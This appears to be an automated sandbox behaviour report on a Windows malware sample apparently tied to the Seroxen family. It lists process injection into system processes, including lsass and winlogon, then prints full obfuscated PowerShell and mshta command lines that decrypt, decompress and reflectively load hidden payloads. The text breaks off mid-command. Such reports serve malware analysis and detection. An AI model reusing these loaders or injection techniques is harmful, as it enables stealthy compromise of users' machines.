PID 552 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 552 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 552 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 552 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 552 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 552 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 552 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4980 wrote to memory of 2480 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 4980 wrote to memory of 2480 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 2480 wrote to memory of 2656 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 2480 wrote to memory of 2656 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 2656 wrote to memory of 3600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 3600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 3600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 3600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 3600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 3600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 3600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 2992 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 wrote to memory of 2992 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 wrote to memory of 2992 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 wrote to memory of 2992 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 wrote to memory of 2992 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 wrote to memory of 2992 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 wrote to memory of 2992 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 wrote to memory of 2992 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 wrote to memory of 2992 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 wrote to memory of 3204 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 2656 wrote to memory of 3204 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 2656 wrote to memory of 1528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 1528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 1528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 1528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 1528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 1528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 1528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 1528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 1528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1528 wrote to memory of 648 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 1528 wrote to memory of 704 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 1528 wrote to memory of 1012 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1528 wrote to memory of 448 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 1528 wrote to memory of 780 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1528 wrote to memory of 628 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1528 wrote to memory of 1084 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1528 wrote to memory of 1092 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1528 wrote to memory of 1200 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1528 wrote to memory of 1224 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1528 wrote to memory of 1272 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1528 wrote to memory of 1316 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1528 wrote to memory of 1436 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1528 wrote to memory of 1488 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1528 wrote to memory of 1512 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{60413543-b28d-43e9-94ce-14cde01c7a56}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{12bfecfc-bdd5-4ae4-a983-2e067fa08bc0}

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{ecd70d80-c62e-4226-bc55-de9460e27172}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{2fe032de-ab54-4cb1-9edf-fa8856ca6027}

C:\Windows\$sxr-powershell.exe

"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2656).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] 